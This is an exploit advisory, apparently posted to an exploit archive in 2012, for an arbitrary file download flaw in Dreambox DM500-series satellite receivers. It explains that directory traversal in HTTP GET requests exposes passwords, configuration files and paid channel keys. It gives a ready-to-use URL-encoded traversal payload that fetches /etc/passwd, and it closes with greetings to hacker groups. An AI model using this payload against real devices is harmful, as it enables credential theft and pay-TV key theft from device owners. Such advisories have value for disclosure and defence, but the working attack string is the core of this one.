# Exploit Title: mutant200s DreamBox Arbitrary File Download Vulnerability # Google Dork: # Date: 30/01 /2012 # Author: k3vin mitnick # Software Link: # Version: # Tested on: # CVE : DreamBox DM500(+) Arbitrary File Download Vulnerability Vendor: Dream Multimedia GmbH Product web page: http://www.dream-multimedia-tv.de Affected version: DM500, DM500+, DM500HD and DM500S Summary: The Dreambox is a series of Linux-powered DVB satellite, terrestrial and cable digital television receivers (set-top box). Desc: Dreambox suffers from a file download vulnerability thru directory traversal with appending the '/' character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc. Tested on: Linux dreambox 2.6.17-mutant200s Vulnerability discovered by: k3vin mitnick website : http://tunisianblackhat.blogspot.com/ exploit : http://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd ----------------------------------------------------- greetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack , scraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki ... and all tunisia hackers 30/01/2012